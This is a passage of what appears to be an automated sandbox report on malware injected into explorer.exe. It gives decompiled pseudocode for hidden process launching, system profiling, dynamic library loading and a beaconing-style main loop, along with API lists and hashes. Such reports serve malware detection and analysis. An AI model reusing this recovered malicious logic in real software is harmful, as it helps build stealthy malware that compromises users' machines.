                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007A8F8D(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				WCHAR* _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				WCHAR* _v20;
                                                                                                                                                                        				short _t30;
                                                                                                                                                                        				short _t33;
                                                                                                                                                                        				intOrPtr _t38;
                                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                                        				intOrPtr _t45;
                                                                                                                                                                        				short _t49;
                                                                                                                                                                        				char _t71;
                                                                                                                                                                        				WCHAR* _t72;
                                                                                                                                                                        
                                                                                                                                                                        				_v16 = _v16 & 0x00000000;
                                                                                                                                                                        				_t71 = 0;
                                                                                                                                                                        				_v12 = __ecx;
                                                                                                                                                                        				_t49 = __edx;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				_t72 = E007A8BDE(0x448);
                                                                                                                                                                        				_v20 = _t72;
                                                                                                                                                                        				if(_t72 != 0) {
                                                                                                                                                                        					_t72[0x21a] = __edx;
                                                                                                                                                                        					_t72[0x21c] = _a8;
                                                                                                                                                                        					lstrcpynW(_t72, _v12, 0x200);
                                                                                                                                                                        					if(_t49 != 1) {
                                                                                                                                                                        						_t30 = E007A8BDE(0x100000);
                                                                                                                                                                        						_t72[0x212] = _t30;
                                                                                                                                                                        						if(_t30 != 0) {
                                                                                                                                                                        							_t69 = _a4;
                                                                                                                                                                        							_t72[0x216] = 0x100000;
                                                                                                                                                                        							if(_a4 != 0) {
                                                                                                                                                                        								E007A8E08(_t72, _t69);
                                                                                                                                                                        							}
                                                                                                                                                                        							L16:
                                                                                                                                                                        							return _t72;
                                                                                                                                                                        						}
                                                                                                                                                                        						L7:
                                                                                                                                                                        						if(_t71 != 0) {
                                                                                                                                                                        							_t21 =  &_v8; // 0x7a5453
                                                                                                                                                                        							E007A8BF4(_t21, 0);
                                                                                                                                                                        						}
                                                                                                                                                                        						L9:
                                                                                                                                                                        						_t33 = _t72[0x218];
                                                                                                                                                                        						if(_t33 != 0) {
                                                                                                                                                                        							_t38 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        							 *((intOrPtr*)(_t38 + 0x30))(_t33);
                                                                                                                                                                        						}
                                                                                                                                                                        						_t73 =  &(_t72[0x212]);
                                                                                                                                                                        						if(_t72[0x212] != 0) {
                                                                                                                                                                        							E007A8BF4(_t73, 0);
                                                                                                                                                                        						}
                                                                                                                                                                        						E007A8BF4( &_v20, 0); // executed
                                                                                                                                                                        						goto L1;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t43 = E007AB3C7(_v12,  &_v16); // executed
                                                                                                                                                                        					_t71 = _t43;
                                                                                                                                                                        					_v8 = _t71;
                                                                                                                                                                        					if(_t71 == 0) {
                                                                                                                                                                        						goto L9;
                                                                                                                                                                        					}
                                                                                                                                                                        					if(E007A8E33(_t72, _t71, _v16, _a4) < 0) {
                                                                                                                                                                        						goto L7;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t45 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
                                                                                                                                                                        						_t72[0x218] = _t72[0x218] & 0x00000000;
                                                                                                                                                                        						_t19 =  &_v8; // 0x7a5453
                                                                                                                                                                        						E007A8BF4(_t19, 0);
                                                                                                                                                                        						goto L16;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				L1:
                                                                                                                                                                        				return 0;
                                                                                                                                                                        			}















                                                                                                                                                                        0x007a900e
                                                                                                                                                                        0x007a9019
                                                                                                                                                                        0x007a901c
                                                                                                                                                                        0x007a9023
                                                                                                                                                                        0x007a9029
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a902f
                                                                                                                                                                        0x007a900c
                                                                                                                                                                        0x007a8fb8
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        • lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003,007AAFC5,00000000), ref: 007A8FD7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeaplstrcpyn
                                                                                                                                                                        • String ID: STz
                                                                                                                                                                        • API String ID: 680773602-4290529673
                                                                                                                                                                        • Opcode ID: d18b230c5f8e35b178b2419d2384b62b00aa28d6c77400a422a4d0bc8b2082bf
                                                                                                                                                                        • Instruction ID: 42fe4682e4b7fb8977ef2fb5795841b4eb3675aaec3eb5ab42b984a0bf57650d
                                                                                                                                                                        • Opcode Fuzzy Hash: d18b230c5f8e35b178b2419d2384b62b00aa28d6c77400a422a4d0bc8b2082bf
                                                                                                                                                                        • Instruction Fuzzy Hash: 2A31C5B2A00305EFDB509B68DC45B9FB7A8EFC2360F604629F61597281DF39AA008758
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                        			E007AB5FB(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16, intOrPtr* _a20) {
                                                                                                                                                                        				struct _PROCESS_INFORMATION _v24;
                                                                                                                                                                        				struct _STARTUPINFOW _v96;
                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                        				intOrPtr _t35;
                                                                                                                                                                        				intOrPtr _t38;
                                                                                                                                                                        				intOrPtr* _t43;
                                                                                                                                                                        				long _t46;
                                                                                                                                                                        				WCHAR* _t48;
                                                                                                                                                                        
                                                                                                                                                                        				_t46 = 0x44;
                                                                                                                                                                        				E007A8D6D( &_v96, 0, _t46);
                                                                                                                                                                        				E007A8D6D( &_v24, 0, 0x10);
                                                                                                                                                                        				_t27 = _a16;
                                                                                                                                                                        				_v96.cb = _t46;
                                                                                                                                                                        				_t48 = 1;
                                                                                                                                                                        				if(_t27 != 0) {
                                                                                                                                                                        					_v96.dwFlags = 1;
                                                                                                                                                                        					_v96.wShowWindow = 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				asm("sbb eax, eax");
                                                                                                                                                                        				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t27 & 0x08000000, 0, 0,  &_v96,  &_v24) == 0) {
                                                                                                                                                                        					_t48 = 0;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					if(_a8 != 0) {
                                                                                                                                                                        						_push(_a12);
                                                                                                                                                                        						_t38 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        						_push(_v24.hProcess);
                                                                                                                                                                        						if( *((intOrPtr*)(_t38 + 0x2c))() >= 0) {
                                                                                                                                                                        							GetExitCodeProcess(_v24.hProcess, _a8);
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					_t43 = _a20;
                                                                                                                                                                        					if(_t43 != 0) {
                                                                                                                                                                        						 *_t43 = _v24.dwProcessId;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t33 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        					 *((intOrPtr*)(_t33 + 0x30))(_v24.hThread);
                                                                                                                                                                        					_t35 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        					 *((intOrPtr*)(_t35 + 0x30))(_v24);
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t48;
                                                                                                                                                                        			}













                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007A8D6D: memset.MSVCRT ref: 007A8D7F
                                                                                                                                                                        • CreateProcessW.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 007AB658
                                                                                                                                                                        • GetExitCodeProcess.KERNEL32 ref: 007AB67C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$CodeCreateExitmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4170947310-0
                                                                                                                                                                        • Opcode ID: 9c027bc269e349096a66d3355c7102ccef48364544ee4a8bc5de8fbfe9f72e0e
                                                                                                                                                                        • Instruction ID: a60614f1ada7e897a32e333938d791ee83ee21b2026e19016c689021ab6f189c
                                                                                                                                                                        • Opcode Fuzzy Hash: 9c027bc269e349096a66d3355c7102ccef48364544ee4a8bc5de8fbfe9f72e0e
                                                                                                                                                                        • Instruction Fuzzy Hash: E9215031A10119AFCF109FAADC49EEF7BB8EF89B01B004229F915E6161D7349900CB65
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E007A5C22(void* __edx, void* __edi) {
                                                                                                                                                                        				void* _t3;
                                                                                                                                                                        				intOrPtr _t5;
                                                                                                                                                                        				void* _t17;
                                                                                                                                                                        				void* _t27;
                                                                                                                                                                        				void* _t39;
                                                                                                                                                                        
                                                                                                                                                                        				_t39 = __edi;
                                                                                                                                                                        				_t3 = E007AA96C(0x3b); // executed
                                                                                                                                                                        				if(_t3 != 0xffffffff) {
                                                                                                                                                                        					L2:
                                                                                                                                                                        					E007AB297();
                                                                                                                                                                        					_t5 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        					E007AAA65(0x3a,  *((intOrPtr*)(_t5 + 0x1640))); // executed
                                                                                                                                                                        					E007AF53A(_t43);
                                                                                                                                                                        					if(E007A5BAA(_t43) != 0) {
                                                                                                                                                                        						E007AA108();
                                                                                                                                                                        						E007AA205(E007A5BEA, 0, __eflags, 0, 0); // executed
                                                                                                                                                                        						E007A14F2(0); // executed
                                                                                                                                                                        						E007A34CC(__eflags);
                                                                                                                                                                        						E007A3501(); // executed
                                                                                                                                                                        						E007A36AA(0, __eflags); // executed
                                                                                                                                                                        						E007A2E6B(); // executed
                                                                                                                                                                        						E007A4209(_t39, __eflags); // executed
                                                                                                                                                                        						while(1) {
                                                                                                                                                                        							_t17 = E007A5ECE();
                                                                                                                                                                        							__eflags = _t17;
                                                                                                                                                                        							if(_t17 != 0) {
                                                                                                                                                                        								break;
                                                                                                                                                                        							}
                                                                                                                                                                        							E007AA065(0x7bf8e8);
                                                                                                                                                                        							_push(0x7bf8e8);
                                                                                                                                                                        							_push(0x7bf8e8); // executed
                                                                                                                                                                        							E007A2CA6();
                                                                                                                                                                        							Sleep(0xfa0);
                                                                                                                                                                        						}
                                                                                                                                                                        						E007A438B();
                                                                                                                                                                        						E007AA3F5();
                                                                                                                                                                        						E007A3B22();
                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                        						return 0;
                                                                                                                                                                        					}
                                                                                                                                                                        					L3:
                                                                                                                                                                        					return 1;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t27 = E007A32A3();
                                                                                                                                                                        				_t43 = _t27;
                                                                                                                                                                        				if(_t27 != 0) {
                                                                                                                                                                        					goto L3;
                                                                                                                                                                        				}
                                                                                                                                                                        				goto L2;
                                                                                                                                                                        			}









                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007AA065: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,007A52C8), ref: 007AA072
                                                                                                                                                                          • Part of subcall function 007AA065: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007AA092
                                                                                                                                                                        • Sleep.KERNELBASE(00000FA0,?,007A6009), ref: 007A5CBE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                        • String ID: j>{M
                                                                                                                                                                        • API String ID: 2563648476-1785681049
                                                                                                                                                                        • Opcode ID: e1067f009abb2fe3419c2b38ce7fdf7f48901d53ad831d2e7e6b5f2f19670237
                                                                                                                                                                        • Instruction ID: 458c644f56681df096ccf8c26f477023ba3f8a012e1e99839961c0c238bdd840
                                                                                                                                                                        • Opcode Fuzzy Hash: e1067f009abb2fe3419c2b38ce7fdf7f48901d53ad831d2e7e6b5f2f19670237
                                                                                                                                                                        • Instruction Fuzzy Hash: DD018021618A02EAE61477B46C0FB2D32889FC7731F244739B655890D3EE5E99018277
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007ADD81(void* __ecx) {
                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                        				intOrPtr _t14;
                                                                                                                                                                        				intOrPtr _t15;
                                                                                                                                                                        				intOrPtr _t16;
                                                                                                                                                                        				intOrPtr _t21;
                                                                                                                                                                        				intOrPtr _t22;
                                                                                                                                                                        				void* _t28;
                                                                                                                                                                        				void* _t32;
                                                                                                                                                                        				struct _OSVERSIONINFOA* _t33;
                                                                                                                                                                        
                                                                                                                                                                        				_t12 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        				_t33 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        				_t14 = E007AC879( *((intOrPtr*)(_t12 + 0x12c))(_t28, _t32, __ecx)); // executed
                                                                                                                                                                        				 *((intOrPtr*)(_t33 + 0x110)) = _t14;
                                                                                                                                                                        				_t3 = _t33 + 0x1644; // 0x7d1644
                                                                                                                                                                        				_t29 = _t3;
                                                                                                                                                                        				_t15 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        				_t16 =  *((intOrPtr*)(_t15 + 0x128))(0, _t3, 0x105);
                                                                                                                                                                        				_t37 = _t16;
                                                                                                                                                                        				if(_t16 != 0) {
                                                                                                                                                                        					_t16 = E007A95F3(_t29, _t37);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t5 = _t33 + 0x228; // 0x7d0228
                                                                                                                                                                        				 *((intOrPtr*)(_t33 + 0x1854)) = _t16;
                                                                                                                                                                        				 *((intOrPtr*)(_t33 + 0x434)) = E007A95F3(_t5, _t37);
                                                                                                                                                                        				E007A8D6D(_t33, 0, 0x9c);
                                                                                                                                                                        				_t33->dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                        				GetVersionExA(_t33);
                                                                                                                                                                        				 *((intOrPtr*)(_t33 + 0x1640)) = GetCurrentProcessId();
                                                                                                                                                                        				_t21 = E007AF368(_t5);
                                                                                                                                                                        				_t9 = _t33 + 0x220; // 0x7d0220
                                                                                                                                                                        				 *((intOrPtr*)(_t33 + 0x21c)) = _t21;
                                                                                                                                                                        				_t22 = E007AF3A3(_t9); // executed
                                                                                                                                                                        				 *((intOrPtr*)(_t33 + 0x218)) = _t22;
                                                                                                                                                                        				return _t22;
                                                                                                                                                                        			}













                                                                                                                                                                        APIs
                                                                                                                                                                        • GetVersionExA.KERNEL32(007D0000,007D0000,?,007A3B9C), ref: 007ADDF4
                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,007A3B9C), ref: 007ADDFA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentProcessVersion
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2809935031-0
                                                                                                                                                                        • Opcode ID: c427d490b84c7682b774fa3acf0fb27b1ca1fe7b5ea418e3a35cb29db4645aee
                                                                                                                                                                        • Instruction ID: 00bb053a04b3b4141c3ab6a821458b0b54418acb0fc5c9c788c0c28ba4a4ff4e
                                                                                                                                                                        • Opcode Fuzzy Hash: c427d490b84c7682b774fa3acf0fb27b1ca1fe7b5ea418e3a35cb29db4645aee
                                                                                                                                                                        • Instruction Fuzzy Hash: 82018E71900700DBC720AF70A84AFDA77E4AF8A310F004A39E65687251EF7865418B84
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                        			E007AF05C(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				char _t5;
                                                                                                                                                                        				struct HINSTANCE__* _t7;
                                                                                                                                                                        				void* _t10;
                                                                                                                                                                        				void* _t12;
                                                                                                                                                                        				void* _t22;
                                                                                                                                                                        				void* _t25;
                                                                                                                                                                        
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				_t12 = __ecx;
                                                                                                                                                                        				_t22 = __edx;
                                                                                                                                                                        				_t5 = E007A9DD8(_a4);
                                                                                                                                                                        				_t25 = 0;
                                                                                                                                                                        				_v8 = _t5;
                                                                                                                                                                        				_push(_t5);
                                                                                                                                                                        				if(_a4 != 0xf43) {
                                                                                                                                                                        					_t7 = LoadLibraryA(); // executed
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t7 = GetModuleHandleA();
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_t7 != 0) {
                                                                                                                                                                        					_t10 = E007AF011(_t12, _t22, _t7); // executed
                                                                                                                                                                        					_t25 = _t10;
                                                                                                                                                                        				}
                                                                                                                                                                        				E007A8B9C( &_v8);
                                                                                                                                                                        				return _t25;
                                                                                                                                                                        			}











                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,007BCA50,?,007A652B,?), ref: 007AF07E
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(00000000,?,?,?,007BCA50,?,007A652B,?), ref: 007AF08B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleLibraryLoadModule
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4133054770-0
                                                                                                                                                                        • Opcode ID: 287c5fdd1bfba0ae17c8b0acd69dfaef31bbfd19a4f51e1d4c76e41e1d1b8d4c
                                                                                                                                                                        • Instruction ID: 802c5a77f50a6ebfcc1407c20031c3f63d4d33e70472f2529cc46497f6d79c4d
                                                                                                                                                                        • Opcode Fuzzy Hash: 287c5fdd1bfba0ae17c8b0acd69dfaef31bbfd19a4f51e1d4c76e41e1d1b8d4c
                                                                                                                                                                        • Instruction Fuzzy Hash: 85F0A771300114ABC714ABE9EC8989BB3ECDFC9351720423AF606D7151EEB89E4086E4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                        			E007A53C7(intOrPtr* __ecx, void* __edx, void* __eflags, void* __fp0) {
                                                                                                                                                                        				char _v40;
                                                                                                                                                                        				char _v44;
                                                                                                                                                                        				char _v48;
                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                        				char _v56;
                                                                                                                                                                        				intOrPtr _v66;
                                                                                                                                                                        				intOrPtr _v68;
                                                                                                                                                                        				char _v72;
                                                                                                                                                                        				signed int _v76;
                                                                                                                                                                        				signed int _v80;
                                                                                                                                                                        				signed int _v84;
                                                                                                                                                                        				signed int _v88;
                                                                                                                                                                        				signed int _v92;
                                                                                                                                                                        				signed int _v96;
                                                                                                                                                                        				signed int _v100;
                                                                                                                                                                        				signed int _v104;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				signed int _t96;
                                                                                                                                                                        				signed int _t97;
                                                                                                                                                                        				signed int _t99;
                                                                                                                                                                        				intOrPtr _t100;
                                                                                                                                                                        				signed int _t102;
                                                                                                                                                                        				void* _t105;
                                                                                                                                                                        				intOrPtr _t108;
                                                                                                                                                                        				intOrPtr _t113;
                                                                                                                                                                        				intOrPtr* _t114;
                                                                                                                                                                        				signed int _t116;
                                                                                                                                                                        				intOrPtr _t117;
                                                                                                                                                                        				intOrPtr _t122;
                                                                                                                                                                        				intOrPtr _t125;
                                                                                                                                                                        				signed int _t131;
                                                                                                                                                                        				intOrPtr _t134;
                                                                                                                                                                        				intOrPtr _t136;
                                                                                                                                                                        				intOrPtr _t137;
                                                                                                                                                                        				intOrPtr _t141;
                                                                                                                                                                        				signed int _t144;
                                                                                                                                                                        				signed int _t149;
                                                                                                                                                                        				intOrPtr _t153;
                                                                                                                                                                        				signed int _t155;
                                                                                                                                                                        				signed int _t156;
                                                                                                                                                                        				signed int _t157;
                                                                                                                                                                        				signed int _t160;
                                                                                                                                                                        				intOrPtr _t172;
                                                                                                                                                                        				intOrPtr _t183;
                                                                                                                                                                        				signed int _t187;
                                                                                                                                                                        				signed int _t192;
                                                                                                                                                                        				intOrPtr* _t203;
                                                                                                                                                                        				intOrPtr _t206;
                                                                                                                                                                        				intOrPtr _t210;
                                                                                                                                                                        				signed int _t211;
                                                                                                                                                                        				signed int _t212;
                                                                                                                                                                        				intOrPtr _t227;
                                                                                                                                                                        				intOrPtr _t229;
                                                                                                                                                                        				signed int _t236;
                                                                                                                                                                        				void* _t237;
                                                                                                                                                                        				intOrPtr _t239;
                                                                                                                                                                        				signed int _t241;
                                                                                                                                                                        				void* _t248;
                                                                                                                                                                        				intOrPtr _t266;
                                                                                                                                                                        				intOrPtr* _t273;
                                                                                                                                                                        				signed int _t275;
                                                                                                                                                                        				intOrPtr _t277;
                                                                                                                                                                        				signed int _t278;
                                                                                                                                                                        				signed int _t280;
                                                                                                                                                                        				intOrPtr* _t282;
                                                                                                                                                                        				void* _t283;
                                                                                                                                                                        				void* _t284;
                                                                                                                                                                        				void* _t307;
                                                                                                                                                                        
                                                                                                                                                                        				_t307 = __fp0;
                                                                                                                                                                        				_t282 = (_t280 & 0xfffffff8) - 0x64;
                                                                                                                                                                        				_t273 = __ecx;
                                                                                                                                                                        				_t96 = E007AF14A(__ecx, __edx);
                                                                                                                                                                        				_t291 = _t96;
                                                                                                                                                                        				if(_t96 != 0) {
                                                                                                                                                                        					L31:
                                                                                                                                                                        					_t97 = _t96 | 0xffffffff;
                                                                                                                                                                        					__eflags = _t97;
                                                                                                                                                                        					L32:
                                                                                                                                                                        					return _t97;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t96 = E007A5021(__edx, _t291); // executed
                                                                                                                                                                        				if(_t96 == 0) {
                                                                                                                                                                        					goto L31;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_push(0xf89);
                                                                                                                                                                        					_t248 = 0x10;
                                                                                                                                                                        					 *0x7bf810 = E007AF05C(0x7bc9f4, _t248);
                                                                                                                                                                        					 *_t282 = 0x9bf;
                                                                                                                                                                        					_t99 = E007A9DF2(0x7bc9f4);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(_t99);
                                                                                                                                                                        					_v96 = _t99;
                                                                                                                                                                        					_t100 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        					_t102 = E007A9A5A(_t100 + 0x228);
                                                                                                                                                                        					_t283 = _t282 + 0xc;
                                                                                                                                                                        					_v100 = _t102;
                                                                                                                                                                        					E007A8BAF( &_v96);
                                                                                                                                                                        					_t105 = E007AC093(_t102);
                                                                                                                                                                        					_t210 = 3;
                                                                                                                                                                        					if(_t105 != 0) {
                                                                                                                                                                        						 *((intOrPtr*)(_t273 + 0x10)) = E007AAFB9();
                                                                                                                                                                        						 *_t273 = _t210;
                                                                                                                                                                        					}
                                                                                                                                                                        					E007A8BF4( &_v100, 0xfffffffe);
                                                                                                                                                                        					_t108 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        					_t7 = _t108 + 0x114; // 0x7d0114
                                                                                                                                                                        					_t219 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0x110)))); // executed
                                                                                                                                                                        					E007A50B3( *((intOrPtr*)( *((intOrPtr*)(_t108 + 0x110)))), _t7, _t307, _t273, 0, 0);
                                                                                                                                                                        					_t266 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        					_t284 = _t283 + 0x14;
                                                                                                                                                                        					if( *((intOrPtr*)(_t266 + 0x101c)) == _t210) {
                                                                                                                                                                        						L8:
                                                                                                                                                                        						E007A8D6D( &_v56, 0, 0x14);
                                                                                                                                                                        						_v52 = _t273;
                                                                                                                                                                        						_t284 = _t284 + 0xc;
                                                                                                                                                                        						_v56 =  *((intOrPtr*)(_t266 + 0x214));
                                                                                                                                                                        						_t113 =  *0x7bf810; // 0xeafbc8
                                                                                                                                                                        						_t114 =  *((intOrPtr*)(_t113 + 8));
                                                                                                                                                                        						_t298 = _t114;
                                                                                                                                                                        						if(_t114 != 0) {
                                                                                                                                                                        							_t219 =  &_v48;
                                                                                                                                                                        							 *_t114(0, 0, 1,  &_v48,  &_v44); // executed
                                                                                                                                                                        						}
                                                                                                                                                                        						E007AF326( &_v56, _t298); // executed
                                                                                                                                                                        						if( *0x7bf8d4 <= 0) {
                                                                                                                                                                        							L26:
                                                                                                                                                                        							_t116 = E007A9DF2(_t219, 0x9bf);
                                                                                                                                                                        							_push(0);
                                                                                                                                                                        							_push(_t116);
                                                                                                                                                                        							_v80 = _t116;
                                                                                                                                                                        							_t117 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        							_t275 = E007A9A5A(_t117 + 0x228);
                                                                                                                                                                        							_v76 = _t275;
                                                                                                                                                                        							__eflags = _t275;
                                                                                                                                                                        							if(_t275 != 0) {
                                                                                                                                                                        								_t131 = E007AC093(_t275);
                                                                                                                                                                        								__eflags = _t131;
                                                                                                                                                                        								if(_t131 != 0) {
                                                                                                                                                                        									_t134 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        									 *((intOrPtr*)(_t134 + 0x118))(_t275);
                                                                                                                                                                        								}
                                                                                                                                                                        								E007A8BF4( &_v76, 0xfffffffe);
                                                                                                                                                                        							}
                                                                                                                                                                        							E007A8BAF( &_v80);
                                                                                                                                                                        							_t122 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        							lstrcpynW(_t122 + 0x438,  *0x7bf8d8, 0x105);
                                                                                                                                                                        							_t125 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        							lstrcpynW(_t125 + 0x228,  *0x7bf8d0, 0x105);
                                                                                                                                                                        							_t277 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        							_t94 = _t277 + 0x228; // 0x7d0228
                                                                                                                                                                        							 *((intOrPtr*)(_t277 + 0x434)) = E007A95F3(_t94, __eflags);
                                                                                                                                                                        							E007A8BF4(0x7bf8d8, 0xfffffffe);
                                                                                                                                                                        							E007A8BF4(0x7bf8d0, 0xfffffffe);
                                                                                                                                                                        							L19:
                                                                                                                                                                        							_t97 = 0;
                                                                                                                                                                        							goto L32;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t136 =  *0x7bf810; // 0xeafbc8
                                                                                                                                                                        						if( *((intOrPtr*)(_t136 + 8)) != 0) {
                                                                                                                                                                        							_t203 =  *((intOrPtr*)(_t136 + 0xc));
                                                                                                                                                                        							if(_t203 != 0) {
                                                                                                                                                                        								 *_t203(_v48);
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						_t137 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        						_t219 =  *((intOrPtr*)(_t137 + 0x214));
                                                                                                                                                                        						if(_t219 == _t210) {
                                                                                                                                                                        							goto L26;
                                                                                                                                                                        						}
                                                                                                                                                                        						if( *((intOrPtr*)(_t137 + 4)) >= 6) {
                                                                                                                                                                        							__eflags =  *((intOrPtr*)(_t137 + 0x101c)) - _t210;
                                                                                                                                                                        							if( *((intOrPtr*)(_t137 + 0x101c)) == _t210) {
                                                                                                                                                                        								E007A5057();
                                                                                                                                                                        								asm("stosd");
                                                                                                                                                                        								asm("stosd");
                                                                                                                                                                        								asm("stosd");
                                                                                                                                                                        								asm("stosd");
                                                                                                                                                                        								_t141 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        								 *((intOrPtr*)(_t141 + 0xe4))( &_v72);
                                                                                                                                                                        								_t219 = _v66;
                                                                                                                                                                        								_t211 = 0x3c;
                                                                                                                                                                        								_t144 = _t219 + 0x00000002 & 0x0000ffff;
                                                                                                                                                                        								_v88 = _t144;
                                                                                                                                                                        								_v84 = _t144 / _t211 + _v68 & 0x0000ffff;
